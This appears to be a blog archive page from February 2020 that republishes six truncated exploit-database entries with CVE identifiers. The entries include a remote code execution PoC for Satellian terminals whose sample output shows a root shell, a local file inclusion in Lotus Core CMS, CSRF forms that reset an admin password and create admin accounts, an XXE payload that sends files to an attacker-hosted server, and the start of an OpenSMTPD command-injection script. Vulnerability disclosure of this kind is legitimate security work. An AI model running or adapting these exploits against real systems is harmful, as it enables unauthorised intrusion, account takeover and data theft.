
Posts

Showing posts from February, 2020

Satellian 1.12 - Remote Code Execution

# Exploit Title: Satellian 1.12 - Remote Code Execution
# Date: 2020-01-28
# Exploit Author: Xh4H
# Vendor Homepage: https://www.intelliantech.com/?lang=en
# Version: v1.12+
# Tested on: Kali linux, MacOS
# CVE : CVE-2020-7980
# Github repository: https://github.com/Xh4H/Satellian-CVE-2020-7980
#
# xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://<redacted>
# ________________________________________
# (__) / \
# (oo) ( Intellian Satellite Terminal PoC )
# /-------\/ --' \________________________________________/
# / | ||
# * ||----||
# Performing initial scan. Listing available system binaries.
# Starting request to http://<redacted>
# Executing command /bin/ls /bin
# acu_server
# acu_tool
# addgroup
# adduser
# ...
# Satellian $ id
# uid=0(root) gid=0(root)

import requests
import argparse
import sys
import calendar
imp...

Lotus Core CMS 1.0.1 - Local File Inclusion

# Exploit Title: Lotus Core CMS 1.0.1 - Local File Inclusion
# Google Dork: N/A
# Date: 2020-01-31
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: http://lotuscore.sourceforge.net/
# Software Link: https://sourceforge.net/projects/lotuscore/files/latest/download
# Version: 1.0.1
# Tested on: Windows 7 x86
# CVE : N/A

The vulnerability occurs on line 65 of the index.php file. First, we can provide the page_slug parameter: if it is not set by the user it defaults to index, but if the user sets the parameter via a GET or POST request, the code checks whether the file exists and, if it does, performs an unsanitized inclusion.

-----------------------------------------------------------------------------
if(!$_REQUEST['page_slug']){
    $_REQUEST['page_slug'] = 'index';
}
if(file_exists('system/plugins/'.$_REQUEST['page_slug'].'.php') == true){
    include('system/plugins/'.$_REQUEST['page_slug'].'.php');
}else{
    in...

Cups Easy 1.0 - Cross Site Request Forgery (Password Reset)

# Title: Cups Easy 1.0 - Cross Site Request Forgery (Password Reset)
# Date: 2020-01-28
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://sourceforge.net/u/ajayshar76/profile/
# Software Link: https://sourceforge.net/projects/cupseasy/files/cupseasylive-1.0/
# Version: 1.0
# Tested on Windows 10/Kali Rolling
# CVE: CVE-2020-8424, CVE-2020-8425

# The Cups Easy (Purchase & Inventory) 1.0 web application is vulnerable to Cross Site Request Forgery
# that would allow an attacker to change the Admin password and gain unrestricted
# access to the site or delete any user.

# Proof of Concept Code for Password Change:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://SITEADDRESS/cupseasylive/passwordmychange.php" method="POST">
<input type="hidden" name="username" value="admin" />
<input type="hidden" name...

XMLBlueprint 16.191112 - XML External Entity Injection

# Exploit Title: XMLBlueprint 16.191112 - XML External Entity Injection
# Exploit Author: Javier Olmedo
# Date: 2018-11-14
# Vendor: XMLBlueprint XML Editor
# Software Link: https://www.xmlblueprint.com/update/download-64bit.exe
# Affected Version: 16.191112 and before
# Patched Version: unpatched
# Category: Local
# Platform: XML
# Tested on: Windows 10 Pro
# CWE: https://cwe.mitre.org/data/definitions/611.html
# CVE: 2019-19032
# References:
# https://hackpuntes.com/cve-2019-19032-xmlblueprint-16-191112-inyeccion-xml/

# 1. Technical Description
# XMLBlueprint XML Editor version 16.191112 and before are affected by XML External Entity
# Injection vulnerability through the malicious XML file. This allows a malicious user
# to read arbitrary files.

# 2. Proof Of Concept (PoC)
# 2.1 Start a webserver to receive the connection.
python -m SimpleHTTPServer 80

# 2.2 Upload the payload.dtd file to your web server.
<?xml version="1.0" encoding="UTF-8"?> ...

OpenSMTPD 6.6.2 - Remote Code Execution

# Exploit Title: OpenSMTPD 6.6.2 - Remote Code Execution
# Exploit Author: 1F98D
# Original Author: Qualys Security Advisory
# Vendor Homepage: https://www.opensmtpd.org/
# Software Link: https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1
# Version: OpenSMTPD < 6.6.2
# Tested on: Debian 9.11 (x64)
# CVE: CVE-2020-7247
# References:
# https://www.openwall.com/lists/oss-security/2020/01/28/3

# OpenSMTPD after commit a8e222352f and before version 6.6.2 does not adequately
# escape dangerous characters from user-controlled input. An attacker
# can exploit this to execute arbitrary shell commands on the target.

#!/usr/local/bin/python3
from socket import *
import sys

if len(sys.argv) != 4:
    print('Usage {} <target ip> <target port> <command>'.format(sys.argv[0]))
    print("E.g. {} 127.0.0.1 25 'touch /tmp/x'".format(sys.argv[0]))
    sys.exit(1)

ADDR = sys...

School ERP System 1.0

# Title: School ERP System 1.0 - Cross Site Request Forgery (Add Admin)
# Date: 2020-01-31
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://sourceforge.net/projects/school-erp-ultimate/files/
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/files/
# Version ERP-Ultimate
# Tested on Windows 10/Kali Rolling

# The School ERP Ultimate web application is vulnerable to Cross Site Request Forgery
# that leads to admin account creation and arbitrary user deletion.

# Proof of Concept for the Admin Account Creation:
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://SITEHERE/office_admin/?pid=42&action=addadmin" method="POST">
      <input type="hidden" name="admin&#95;fname" value="Admin" />
      <input type="hidden" name="admin&#95;lname" value="Tester" /...